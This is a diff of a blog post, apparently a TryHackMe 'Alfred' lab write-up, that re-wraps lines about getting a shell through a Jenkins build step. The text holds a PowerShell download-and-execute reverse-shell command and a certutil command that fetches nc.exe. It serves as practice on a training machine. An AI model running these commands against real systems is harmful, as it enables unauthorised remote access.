joonkim0625/joonkim0625.github.io/_posts/2023-6-26-THM-Alfred.md

 powershell iex(New-Object Net.WebClient).DownloadString('http://<IP>:<port>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker's IP> -Port <attacker's Port>
 ```

 - this should be followed by opening a listener using `nc`
 - the address in the downloadstring portion must be your python server
 - attacker's port must match 'nc' listener's port number

-Once you put that command into the build section, come back to the main page and click the greenish icon to start the build process.
-After that, you will be able to see the reverse shell connection is established (if not, check the typos in the command you entered or not setting listeners up properly).
+Once you put that command into the build section, come back to the main page and
+click the greenish icon to start the build process.
+After that, you will be able
+to see the reverse shell connection is established (if not, check the typos in
+the command you entered or not setting listeners up properly).

 There is another way you can establish a connection using `nc`.
+Instead of
-Instead of uploading a shell, we can upload `nc` then manually call a reverse shell (what I mean by manually is without any help of created shell files).
+uploading a shell, we can upload `nc` then manually call a reverse shell (what I
+mean by manually is without any help of created shell files).

-First build command we can enter is `certutil.exe -urlcache -split -f "http://<IP>:<Port>/nc.exe" %tmp%\nc.exe`.
-This command will put the nc program into the temp directory.  #cerutil a command-line program that can actually run some of other commands.
+First build command we can enter is `certutil.exe -urlcache -split -f
+"http://<IP>:<Port>/nc.exe" %tmp%\nc.exe`.
+This command will put the nc program
+into the temp directory.  `cerutil` is a command-line program that can actually run
+some of other commands.

 Also, you could have used the reverse shell created using `msfvenom`.